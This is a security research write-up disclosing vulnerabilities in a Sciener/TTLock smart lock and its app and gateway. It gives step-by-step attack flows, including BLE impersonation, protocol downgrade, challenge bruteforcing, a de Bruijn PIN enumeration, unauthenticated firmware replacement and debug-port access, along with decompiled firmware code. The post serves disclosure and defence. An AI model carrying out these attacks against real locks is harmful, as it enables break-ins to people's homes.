<--

Say Friend and Enter: Digitally lockpicking an advanced smart lock (Part 2: discovered vulnerabilities)

By Lev Aronsky (@levaronsky) & Idan Strovinsky & Tomer Telem
March 7, 2024
*
*
Disclaimer: code excerpts provided here are
based on Ghidra's decompiler, and might have
syntax issues, such as non-existent types,
missing return statements, etc.
Special thanks to Yoav Linhart for his
contribution about the de Bruijn sequence in
this post.

Preface

The first part of this research explained the work that was done in order to understand the inner workings of Sciener’s firmware, as well as the TTLock application. In this part, we will go over the vulnerabilities we have discovered based on that knowledge and understanding.

Vulnerabilities

Reusing a virtual key

The first vulnerability we thought of - and it follows from simply combining several facts about the protocol - is the ability to reuse a virtual key.

As mentioned before, the TTLock app has the ability to grant virtual keys to arbitrary users. Thus, e.g., an AirBNB guest can install the TTLock app, log in with their own user, and be granted a virtual key to the house for the duration of their stay. However, there are several facts worth considering:

  1. The lock uses a single AES key to communicate with phones. It means, that any person who receives a virtual key must also receive the AES key used to communicate with the lock.
  2. When the virtual key is used by the TTLock app, it uses the check_user_time function for authorization - which requires just the time frame during which the virtual key is valid (i.e., the secret adminPs is not required to call this function).
  3. The check_user_time function still requires a challenge response. Therefore, in order to generate one, any person who receives a virtual key must also receive the value of unlockKey.

Armed with the understanding of the above points, the vulnerability becomes clear: any person who receives a virtual key, has all the information required to communicate with the lock (1, AES key), to perform authorization using check_user_time (2, using arbitrary time frames such that the virtual key is valid), and to supply a valid challenge response (3, using the value of unlockKey). That information can be extracted from the TTLock app upon receiving it, and used at a later time. As a matter of fact, all of the limits that can be applied to the virtual key (single-time use, validity time frame, etc.) are enforced by the app itself, and not by the lock. And since none of the values change over time, the key will remain usable by the attacker until the lock is reset.

Challenge bruteforcing

Of course, we were interested in the ability to open the lock without prior exposure to a key (limited or not). That’s where the MITM ability would become useful.

By developing a firmware that imitates the lock, we could receive connection attempts from an unsuspecting app in place of the actual lock. The lock is only capable of servicing a single connection at a time - i.e., once an app (or our impersonation device) connects to the lock, it won’t be possible to connect to it again until the connection is closed. Therefore, if we connect to the lock continuously (and keep it open, reconnecting as necessary), our impersonation device will be the only one actually broadcasting and accepting connections - and that will ensure the app will connect to our device.

Once the connection to our impersonation device is established by the phone, we can save the initial message coming from the app. Presumably coming from the owner (in an attack scenario where the impersonation device is placed near the actual lock), the message would be an encrypted check_admin command. While we don’t have the encryption key, we do not need it to reuse the message - the message will remain the same since the encryption key and the contents are static. We save the message for future use, and forward it to the actual lock. The lock will receive the message, and reply with a challenge request. Again, we cannot read the contents of the challenge requests - but we send it back to the app. The app sends the challenge response. While the response is encrypted, we save it nonetheless - as due to the symmetric encryption and no random seeds, this message will be reusable whenever the challenge request is the same. We forward the response to the lock, and it unlocks, as the owner expects.

At this point, we have 2 important messages on hand. We have the encrypted check_admin authorization message, that can be used whenever we want; and we have the unlock message that contains a challenge response to a specific challenge request (we do not know the value of the challenge request, since we have no access to the encryption key). Armed with these 2 messages, we can start a bruteforce attack on the lock:

  1. Connect to the lock.
  2. Send the check_admin authorization message.
  3. Receive an encrypted challenge request.
  4. Hope it’s the challenge value that matches our stored challenge response (remember, the challenge value is a random 16-bit integer, so the chance of that is 1/65,536).
  5. Send the stored challenge response. If the lock opens - bingo! Otherwise, disconnect, and go back to step 1.

This kind of bruteforce attack is rather slow, since a new challenge request is only generated upon the first time check_admin is issued during a connection (that’s why we go back to step 1, and not step 2). And the process of reconnecting to the lock can take several seconds - because of its battery-efficient behavior. Thus, given the chance of success of 1/65,536 on each attempt, and several seconds spent on each attempt, in practice such an attack would take several days on average.

Plaintext message processing

This curious vulnerability was discovered accidentally. As we developed the code for bruteforcing the challenge, we made a mistake: we did not encrypt one of the messages sent to the lock (specifically, the one that contained the challenge response). However, the code worked! In fact, we only realized our mistake days later, when reviewing the code due to a different issue. At this point, we fixed the code, encrypted the message, and the code continued to work as expected. This piqued our curiosity - how was it possible, that the code worked in both cases? And just to disillusion the readers - the challenge was definitely processed, sending the wrong challenge response failed to open the lock.

We started analyzing the decryption function, and realized something intriguing. In the beginning of the procedure, the length of the buffer is shifted 4 bits to the right (blocks_count = len >> 4; - AES is a block cipher, and the function needs to know the amount of 16-byte blocks contained in the ciphertext). Then, in the following line, the block count is checked (if (blocks_count != 0)), and if it’s 0 - that huge block of code inside the if, responsible for the actual decryption process, is skipped!

Control goes directly to LAB_0000d162 (repeated here for clarity), where some logic is applied, and based on the contents of the buffer itself, the function will return either 0 or the length of the buffer:

blocks_count = (uint)plaintext[len - 1];
if ((blocks_count == 0) || (total_decrypted = len - blocks_count, len <= blocks_count)) {
  total_decrypted = 0;
}
return total_decrypted;

To clarify - we want to return a non-zero value, since the return value of the function indicates the amount of decrypted bytes. A non-zero return means the function decrypted the ciphertext successfully - but in our case, no changes were performed to the ciphertext, and so the caller of this decryption function will proceed to process the “ciphertext” as if it’s the decrypted plaintext. In other words, we’ll be able to send an arbitrary message (with a few limitations, like a length of under 16 bytes), and cause the lock to process it, without the need to encrypt it first.

The logic to return a non-zero value from the function is as follows:

  1. blocks_count is set to the value of the last byte of the message buffer (that’s under our control).
  2. It should be non-zero (otherwise the if condition is met, and total_decrypted is set to 0).
  3. It should also be smaller than the length of the buffer, again - to avoid meeting the if condition.
  4. total_decrypted is set to the difference between the length of the message buffer, and the current value of blocks_count, i.e., the value of the last byte in the message buffer.
  5. The value of total_decrypted is returned.

In fact, to maximize the size of the message we return, we should set the last byte to 01, and the resulting return value will be the length of the original message buffer minus 1.

So, an example buffer that would meet the requirements is de ad be ef 01, and if such a buffer is sent - the lock will process that message, assuming it was successfully decrypted to de ad be ef.

While not very useful on its own, this vulnerability can be leveraged in order to exploit other issues found in the lock’s firmware.

Application protocol downgrade

The TTLock app supports many different locks from Sciener, that communicate over different versions of the protocol. Whereas the latest version of the protocol, used by Kontrol Lux Lock, uses AES encryption, earlier versions are practically unencrypted (yep, XOR with a single byte does not count as encryption in our book). When the lock is first paired/initialized, the app figures out the protocol version to be used with the lock, and stores it. Thus upon subsequent connections to the lock, it knows the correct version of the protocol to use for communicating with the lock - in our case, v3 that uses AES encryption.

However, there is a serious flaw in the app’s logic when processing messages coming from the lock (apparent in the huge method called processCommandResponse, in the com.ttlock.bl.sdk.service.BluetoothLeService class). Instead of relying on what it knows about the lock, the app parses the incoming message, including the information about the protocol version used, and processes the message based on the protocol version indicated in the message header. It means that when we impersonate the lock, upon receiving the initial, AES-encrypted authorization message, we can reply with a response using a lower protocol version (that isn’t encrypted), and the app will process it. Similar to the previous vulnerability, we can supply data to the app without knowing the encryption key.

But wait, there’s more! The issue is exacerbated further by another flaw: once the app processes the protocol version in the response message, it also uses that protocol version in the subsequent messages sent to the lock during that session. It means that we essentially can coerce the app to expose the value of unlockKey during our MITM attack, and as we will see shortly - this will considerably reduce the time required to open the lock during exploitation. The MITM attack flow becomes as following:

  1. Stage one (MITM attack)
    1. Keep the lock busy, so that the app connects to our impersonation device.
    2. Store the AES-encrypted authorization message, just like before.
    3. Reply with a challenge request with a known value (such as 0), while downgrading the protocol so encryption isn’t used.
    4. Receive an unencrypted challenge response from the app, and calculate the value of unlockKey (if the challenge request was 0, the challenge response is the value of unlockKey).
    5. Store the value of unlockKey, close the connection, and drop the MITM act (at this point, the legitimate user will wonder why the lock didn’t respond to the unlock command, and will presumably try again).
  2. Stage two (unlocking)
    1. Connect to the lock.
    2. Supply the AES-encrypted authorization message.
    3. Receive an AES-encrypted challenge request.
    4. Using the previous vulnerability (plaintext message processing by the lock), respond with an unencrypted challenge response. While we don’t know the challenge value (it was encrypted), we know the value of unlockKey, and we simply guess the challenge value with a 1/65,536 chance that the response will be accepted.

And here’s the kicker: the lock does not close the connection when a wrong challenge response was provided; it does not generate a new challenge request; and it does not limit the amount of attempts a challenge response can be supplied. That means that step 2.4 above is repeated, enumerating over the 65,536 possible values of the challenge, until the lock opens up. And, contrary to the first challenge bruteforcing, in this case the connection to the lock remains open - considerably speeding up the process. Our testing showed that we could send about 30 challenge responses per second. At that rate, it would take about 40 minutes to enumerate over all the possible challenge values. And since the challenge value does not change during the attack, we are guaranteed to open the lock in 40 minutes or less. In fact, the median time for opening the lock will be just 20 minutes.

Gateway key replacement

The gateway does not contain the lock encryption key (and thus, any data that is intended for the lock cannot be read by the gateway). Thus, taking control of the gateway does not result in an immediate takeover of the lock itself. Nonetheless, there was one glaring issue with the gateway’s implementation (its server, to be precise).

When we analyzed the protocol used by the gateway, we developed a Python script that would emulate the gateway. The script would connect to Sciener’s server, and authenticate as a gateway. A short reminder - the initial connection would use a known, hardcoded AES key, and afterwards a new, random AES key would be generated and used for subsequent connections.

The gateway is identified by the server solely by its MAC address. So we could easily create a fake gateway with a generated MAC address, and the server would assume that a new gateway has been activated. So far, so good - but what would be the purpose of such a gateway in an attack scenario? The gateway protocol supports a message that indicates a lock detected nearby (essentially, it retransmits the lock’s advertisement packet). That means, we could indicate to the server that our fake gateway was next to a real-life lock that we intended to attack. Unfortunately, that wasn’t enough for the server to start sending messages intended to that lock through our gateway - when a gateway is initialized through the proper channels (using the app), it is “paired” to the owner’s locks on the server’s side. So, messages intended for the lock are only sent through gateways belonging to the lock’s owner.

So, we needed to impersonate an existing gateway, i.e. with a MAC address that was already registered by the server. Ostensibly, this shouldn’t be possible, since the encryption key has already been generated and in use… But we found this assumption to be completely false!

To recap, the process of a gateway initialization is as follows (we’ll call the hardcoded AES key HAK, and the generated AES key GAK):

  1. Connect to the server and announce yourself (MAC included) encrypted with HAK.
  2. Receive server’s acknowledgement, encrypted with HAK.
  3. Generate a new GAK, encrypt it with HAK, and send it to the server.
  4. Receive server’s acknowledgement, encrypted with the new GAK.
  5. From this point onwards, all communications are encrypted with the new GAK.

When a gateway reconnects to the server after it has already been initialized (e.g. after a power outage), it simply skips steps 3-4 above, and communicates using the GAK that is already stored in the gateway and on the server.

However, we discovered that if we emulate an existing gateway (i.e., use a MAC address that has already been registered with another gateway), and simply send a message with a new GAK, encrypted with HAK, the server accepts it and switches to use it in the following communications! Furthermore, the server uses the most recent connection with a given gateway MAC address. I.e., when the server will need to send a message to the lock through a gateway with the registered MAC, it will use our connection! At this point, we can carry out the same attacks that required a BLE MITM.

There is one limitation to this vulnerability: it’s difficult to find out the gateway’s MAC. Whereas the lock advertises itself openly, the gateway only advertises itself for the first 60 seconds from powering up (so that a phone can connect to it and initialize it), and once that time passes (and it’s connected to the server), it uses BLE solely in client mode, to connect to the lock. So, the only plausible way for an attacker to find out the gateway’s MAC would be to cause a power outage to the target apartment - a task that is not necessarily easy, depending on the infrastructure (newer apartments usually have the breakers inside the apartment), and certainly not very stealthy.

Undocumented check_user_time alternative

When analyzing the code in the lock’s firmware that’s responsible for processing the different commands, we found a piece of code that was very similar to the check_user_time command, but instead of verifying the time frame provided was correct, it simply verified that the message contained the word SCIENER. If the check was successful, the function would proceed as if user authorization was achieved, and returned a challenge request. We assume that this command is used by BLE remote controls (not provided with our lock).

Presumably, there’s nothing interesting in this discovery, since the contents of the check_user_time message are not secret (as opposed to check_admin). But there’s one important difference here: the message size of a check_user_time command is 0x11 bytes, meaning it is not susceptible to the plaintext processing vulnerability. Whereas this new command only contains the word SCIENER, and thus a message containing the string "SCIENER\x01" will be accepted, processed, and successfully pass the user authorization step (since the value comparison does not use strcmp, but an equivalent of strstr).

Thus, we can gain user authorization without prior knowledge - and without the MITM attack. And once authorized, we can proceed to bruteforce the challenge, again, by providing the challenge responses exploiting the plaintext processing vulnerability. Essentially, we have a challenge bruteforcing attack without any prerequisites.

Unfortunately, while the maximum data throughput of a BLE connection is 1Mbps (or 2Mbps in certain configurations), the lock operates at a far slower rate (presumably, for power efficiency). Thus, we weren’t able to send more than ~30 challenge responses per second. And since in this attack, the unlockKey value is unknown, we enumerate over its range (a 0 - 1000000000, and not a complete 32 bits, due to the way it’s generated), and not the 16 bits of the challenge value. Thus, a successful unlocking will take at most about a year, and the median time to unlock will be about half a year, making this attack not practical.

Wireless keypad bruteforcing

In the previous post, we described how a wireless keypad connects to the lock, generates an AES key for further communication, and then transmits key presses performed by its user. Keen-eyed readers will have noticed that the initial key used for starting the communication is hardcoded. In other words, anyone can start communicating with the lock using that key, and the lock will assume it’s a new wireless keypad. The lock does not have a management of previously connected wireless keypads, so this action will always succeed, regardless of whether the lock has been used with a wireless keypad beforehand.

Once the attacker has impersonated a wireless keypad connection, they can send key presses just like a wireless keypad would. However, the protocol supports sending multiple key presses at once (for efficiency, to avoid the overhead of a complete BLE packet for each key press). Therefore, instead of sending each key press separately, the attacker can string multiple PINs one after the other (separated by the # key press), that will be processed by the lock in sequence, instead of testing those PINs by inputting them into the lock keypad manually. This speeds up brute forcing of the PIN considerably.

Another issue that makes the attack even more efficient is the use of strstr function in the lock’s code, when testing the user input against the stored PIN. Given that the admin’s PIN code generated at lock initialization consists of 7 digits, and PIN codes can be 10 digits in length, each 10-digit PIN code sent by the attacker actually tests for multiple options. For example, when the attacker tests the PIN 0123456789, the lock will open if the actual PIN is either of:

  • 0123456
  • 1234567
  • 2345678
  • 3456789

That’s 4 tests in a single attempt (and remember, multiple attempts in a single BLE message are possible)! Enumerating over all the PIN options in the most efficient way is basically the following combinatorial problem: find a set of minimum size, that consists of 10-digit strings, and every possible 7-digit string appears as a consecutive substring of a string in the set. There are 10^7 strings of 7 digits. Therefore, a naive solution would be to simply pad each 7-digit string with zeroes and call it a day. But can we do better?

Every 10-digit string consists of at most 4 unique 7-digit strings, so the best we can hope of is to use 10^7/4 strings in total. Is such a solution possible? Turns out that the answer is yes! The algorithm heavily relies on the de Bruijn Sequence.

Let’s look at a de Bruijn sequence of order 7 on a size-10 alphabet - it is a cyclic sequence in which every 7-digit string occurs exactly once as a substring. The general de Bruijn sequence is denoted as B(k, n) and it has the length k^n (we have k=10, n=7). The construction of B(k, n) is well known. This Python code, taken from Wikipedia, constructs it:

from typing import Iterable, Union, Any

def de_bruijn(k: Union[Iterable[Any], int], n: int) -> str:
    """de Bruijn sequence for alphabet k
    and subsequences of length n.
    """
    # Two kinds of alphabet input: an integer expands
    # to a list of integers as the alphabet..
    if isinstance(k, int):
        alphabet = list(map(str, range(k)))
    else:
        # While any sort of list becomes used as it is
        alphabet = k
        k = len(k)

    a = [0] * k * n
    sequence = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                sequence.extend(a[1 : p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in sequence)


print(de_bruijn(10, 7))

How does this solve our problem? Well, we can “slice” the sequence into strings of length 10. The first string will consist of the digits in indexes 0 to 9, the second - 4 to 13, the third - 8 to 17, and so on. The first 18 digits of our de Bruijn sequence will be 000000010000002000. Therefore, the first 3 strings will be:

  • 0000000100
  • 0001000000
  • 0000002000

In the end, we will end up with 10^7/4 strings, and every 7-digit string will appear as a substring exactly once. That results in a complete enumeration within 10^7/4 (2,500,000) attempts, and on average, half of these attempts (1,250,000) will be required.

It sounds like a very serious flaw that would allow opening the lock very quickly, and it would be - but it’s hindered by one protection mechanism that makes this attack impractical. In the case of PIN codes, as opposed to challenge responses, the lock actually limits the amount of mistakes a user can make (it’s about 5). Once the limit is reached, the lock emits an alarm sound, and refuses any input for about 15 seconds. This is a limitation that, despite our best efforts, we were not able to circumvent. And so, even if the alarm sound is deemed insignificant, enumerating all the possibilities will take a prohibitively long time. Nonetheless, if somebody does discover a way to overcome the rate limit, this vulnerability becomes critical and allows opening the lock in a matter of minutes at most.

Unauthenticated update and complete takeover

From the beginning of our research, we focused on the BLE service used by the app to send various commands to the lock, identified by the UUID 00001910-0000-1000-8000-00805f9b34fb. In fact, we even began analyzing the relevant command for engaging the OTA update (command 0x02), but it required successfully passing the check_admin check and challenge, so we did not investigate it further at the time.

At some point, however, as we were poking around the firmware, we realized something quite surprising: there was another BLE service, with a separate write characteristic and all, responsible for the firmware update! We’ve actually seen this service before (it’s exposed during the regular BLE scan), but we ignored it, not knowing its purpose. Now, however, we reached the point in the firmware that was responsible for handling messages in this service, and - eventually - updating the firmware on the lock (shortened for brevity):

undefined4 handle_ota_packet(byte *value)
{
  [...]  
  first_short = *(ushort *)(value + 0xd);
  offset = (uint)first_short;
  if (offset == 0xff00) {
    if (context->handler_0 == NULL) {
      return 0;
    }
    call_function_indirect
              ((char)value,(char)in_r1,in_r2,context->handler_0);
    return 0;
  }
  if (offset == 0xff01) {
    context->field_0x20 = 1;
    context->time_of_last_write = *(uint *)PTR_REG_SYSTEM_TICK_00026360;
    context->last_written_offset = 0xfffffffe;
    if (context->handler_1 != NULL) {
      call_function_indirect((char)value,(char)in_r1,1,context->handler_1);
    }
    context->first_packet_was_fw_start = false;
    context->expected_packet_count = 0x4000;
    return 0;
  }
  if (offset == 0xff02) {
    uVar4 = (uint)value[0x10];
    in_r1 = (uint)value[0x11];
    bVar2 = 0;
    if (context->first_packet_was_fw_start != false) {
      bVar2 = ~(context->fw_written_successfully +
                ~context->fw_written_successfully + 1) & 6;
    }
    uVar1 = (uint)value[6];
    if (*(short *)(value + 6) == 9) {
      in_r1 = (uint)(*(ushort *)(value + 0x11) ^ *(ushort *)(value + 0xf));
      uVar1 = uVar4;
      if ((in_r1 == DAT_00026368) &&
         ((uint)*(ushort *)(value + 0xf) != context->last_written_offset)
         ) {
        bVar2 = 4;
        goto LAB_000260f4;
      }
    }
    uVar4 = uVar1;
    if (bVar2 == 0) {
      if (context->handler_2 != NULL) {
        call_function_indirect
                  (0,(char)in_r1,(char)uVar4,context->handler_2);
      }
      mark_firmware_for_boot();
      reboot();
      return 0;
    }
    goto LAB_000260f4;
  }
  uVar4 = context->last_written_offset + 1;
  if (uVar4 != offset) {
    bVar2 = 1;
    if ((int)offset <= (int)context->last_written_offset) {
      return 0;
    }
    goto LAB_000260f4;
  }
  uVar4 = checksum(value + 0xd,0x12);
  in_r1 = 0;
  bVar2 = 2;
  if (uVar4 != *(ushort *)(value + 0x1f)) goto LAB_000260f4;
  if (offset == 0) {
    if (value[0x15] == 0x5d) {
      if (value[0x16] != 2) goto LAB_000262be;
      context->first_packet_was_fw_start = true;
      first_packet_was_fw_start = true;
      do_not_write = false;
    }
    else if (value[0x15] == 0) {
      context->first_packet_was_fw_start = SUB21(first_short,0);
      first_packet_was_fw_start = false;
      do_not_write = false;
    }
    else {
LAB_000262be:
      first_packet_was_fw_start = false;
      context->first_packet_was_fw_start = false;
      do_not_write = true;
    }
    context->fw_start_checksum = 0xfffffffe;
  }
  else {
    first_packet_was_fw_start = context->first_packet_was_fw_start;
    do_not_write = false;
  }
  if (first_packet_was_fw_start != false) {
    expected_packet_count = (uint)context->expected_packet_count;
    if (offset <= expected_packet_count) {
      if (offset == 1) {
        uVar4 = (uint)value[0x1a] << 0x18 |
                (uint)value[0x18] << 8 | (uint)value[0x19] << 0x10 | (uint)value[0x17];
        if ((DAT_0002636c < uVar4 - 1) || ((value[0x17] & 0xf) != 4)) {
          context->expected_packet_count = 0x4000;
          first_packet_was_fw_start = false;
          context->first_packet_was_fw_start = false;
          do_not_write = true;
        }
        else {
          context->expected_packet_count = (short)(uVar4 >> 4) - 1;
        }
      }
      pbVar6 = local_44;
      pbVar3 = value;
      pbVar5 = pbVar6;
      do {
        bVar2 = pbVar3[0xf];
        *pbVar5 = bVar2 & 0xf;
        pbVar5[1] = bVar2 >> 4;
        pbVar3 = pbVar3 + 1;
        pbVar5 = pbVar5 + 2;
      } while (pbVar5 != &stack0xffffffdc);
      in_r1 = context->fw_start_checksum;
      do {
        in_r1 = *(uint *)(PTR_DAT_00026364 + ((in_r1 ^ *pbVar6) & 0xf) * 4) ^ in_r1 >> 4;
        pbVar6 = pbVar6 + 1;
      } while (pbVar6 != pbVar5);
      context->fw_start_checksum = in_r1;
      if (first_packet_was_fw_start == false) goto LAB_00026246;
      expected_packet_count = (uint)context->expected_packet_count;
    }
    if (offset == expected_packet_count + 1) {
      uVar4 = context->fw_start_checksum;
      bVar2 = 6;
      if (uVar4 != ((uint)value[0x12] << 0x18 |
                   (uint)value[0x10] << 8 | (uint)value[0x11] << 0x10 | (uint)value[0xf]))
      goto LAB_000260f4;
      context->fw_written_successfully = 1;
    }
  }
LAB_00026246:
  bVar2 = 6;
  uVar4 = 0;
  if (!do_not_write) {
    flash_write_16_bytes(offset * 0x10,value + 0xf);
    flash_read_page(offset * 0x10 + context->base_address,0x10,local_44);
    write_failed = memcmp(local_44,value + 0xf,0x10);
    bVar2 = 3;
    in_r1 = extraout_r1;
    uVar4 = extraout_r2;
    if (write_failed == 0) {
      context->last_written_offset = offset;
      return 0;
    }
  }
LAB_000260f4:
  if (context->handler_2 != NULL) {
    call_function_indirect(bVar2,(char)in_r1,(char)uVar4,context->handler_2);
  }
  uVar4 = context->last_written_offset;
  if (-1 < (int)uVar4) {
    *PTR_REG_IRQ_MASK+3_00026354 = 0;
    uVar4 = 0x3ff00 & uVar4;
    do {
      flash_erase_sector(uVar4 * 0x10 + context->base_address);
      uVar4 += -0x100;
    } while (-1 < (int)uVar4);
  }
  reboot();
  return 0;
}

That function is rather long, with various logic checks applied throughout it, but here is an attempt to describe the process in a simple manner:

  1. There are 4 types of messages that this service can process - 3 control messages and 1 data message:
    1. Control message 0xff00 - unimplemented in the analyzed firmware (the app side refers to this as “prepare firmware update”)
    2. Control message 0xff01 - begin firmware update
    3. Control message 0xff02 - complete firmware update
    4. Data message, containing a 16-bit offset (flash address to write to), the bytes to be written (up to 16), and the CRC of the message. The offset should be aligned to 0x10.
  2. First, the 0xff01 control message is sent, indicating that a firmware update is about to begin. When handling this message, the lock verifies that a firmware update has actually been requested, by checking a flag that is set when the OTA command (command 0x02, mentioned above) is sent. This function prepares the firmware update process by setting the expected chunks count to 0x4000 (and with each chunk being 0x10 bytes long, a firmware with the size of 0x40000 bytes - exactly the size of a flash partition). It also initializes another variable in the context structure that is supposed to hold the last offset that has been written.
  3. Next, firmware chunks are sent one by one, with increasing offsets. As each chunk is received, the lock verifies a few things (that it’s the expected chunk - i.e., the offset follows the previously received one; that the expected amount of chunks hasn’t been reached), and then writes the data to flash. It’s worth noting here that the lock uses two flash partitions, at offsets 0x0 and 0x40000, to hold the firmware. One partition is marked active (and is booted and running), and the other is marked inactive (and the OTA update is written to it). The app sending the update does not need to be aware of the actual partition in use, and should always use offsets starting from 0x0 - the lock maps it to 0x40000 automatically, if required.
  4. Finally, the 0xff02 control message is sent. The lock marks the written firmware as ready to boot (and the currently running firmware as invalid), and reboots. Upon boot, the bootloader will select the new active partition, and the new firmware will be up and running at that point.

Ostensibly, the process is well protected, as the 0xff01 message verifies a flag that can only be set by passing the check_admin check properly. However, what happens if we skip this initial message altogether?

Well, there are two main obstacles to pass. One is the complex logic of handling data. After many unsuccessful attempts to write chunks of data that would fit the logical conditions sprayed throughout the function body, we realized (rather by accident) that most of these conditions exist to verify that the first 2 chunks (the first 32 bytes) written actually match what’s expected of a firmware start. That’s why our names for some of the variables in the code above may be misleading - they are simply remnants of an attempt to understand the function prior to this discovery. And the second obstacle would be an issue with the chunks expectation and the processed chunks - both being set by the initial message handler. However, it seems that those values are either preset by the firmware regardless, or are overwritten after the initial chunks (that contain the expected firmware size) are received.

And so, the exploit of this vulnerability becomes as simple as:

  1. Build a firmware for the lock (an SDK is available from Telink).
  2. Connect to the lock over BLE.
  3. Write the firmware to the OTA service/characteristic, in chunks of 0x10 bytes each (preceded with an increasing offset and followed by a CRC).
  4. Write the message 0xff02 to that characteristic.
  5. The lock will restart and boot into the custom firmware - game over!

For proof-of-concept purposes, we developed a firmware that reads the admin’s PIN (not to be confused with adminPs, the PIN is simply a 7-digit code that can be used over the keypad to open the lock). It then exposes the PIN via beeps (transmitting over BLE is a more robust approach, but requires more coding and doesn’t look as impressive on video), marks itself as invalid and the original firmware as active, and reboots. Thus, it provides the attacker the means to open the lock at any time, while leaving the lock completely unchanged. We promised lockpicking - but, in our opinion, this is even better! It’s more akin to creating a master key by merely looking at a lock.

We did run into one issue: it’s not possible to push big firmware updates using this method - the limit seems to be around the 15-16KB. That’s not a limitation of the size, however - there seems to be a watchdog that stops the firmware update process, and 15-16KB is simply the size that’s small enough to finish transferring before the watchdog kicks in. The real firmware is quite a bit bigger, but the official update mechanism simply disables the watchdog prior to performing the update. Of course, if there is a real need to upload a bigger firmware, it’s possible to do by developing a smaller, bootstrap firmware, that is only responsible for receiving and writing the real one.

Unprotected debug port

We’d like to finish this post with one last, physical issue. As we mentioned before, the lock contains two TLSR8251 chips, one on each side. Our initial assumption was that the chip located on the apartment side (i.e., accessible from within the apartment) is the one responsible for all the communication and logic, whereas the second chip (located outside) is only responsible for passing along the input from the peripherals located outside (keypad, fingerprint reader, RFID reader). We were shocked to discover that the firmware we analyzed was, in fact, the firmware of the chip located outside! That meant that all of the business, security, and communications logic was running on the chip that was exposed to the outside world, whereas the chip that was more protected was merely responsible for operating the lock motor based on commands from the main chip. But, how detrimental is it to the lock’s security? As it turns out, very.

Remember, an attacker that has access to the debug pin has complete control over the functionality of the lock. And the Telink chips require only a single wire for debugging purposes (that’s in addition to ground and voltage, but that can be easily matched with the debugger through the micro-USB port located on the outside part of the lock and intended for emergency power). And the debug port has a breakout pad (marked on the following image).

Mainboard of the outside side unit()

But what makes this issue really severe is the fact that on the other side of the board is just a piece of plastic with the keypad numbers on it. There is literally no other protection between that debug port and the outside world. Therefore, an attacker who knows the exact location of the breakout pad in relation to the keypad (and that can be easily measured if you have such a lock on your hands) can drill a tiny hole, insert a wire connected to a debugger, and gain complete control over the main MCU of the lock.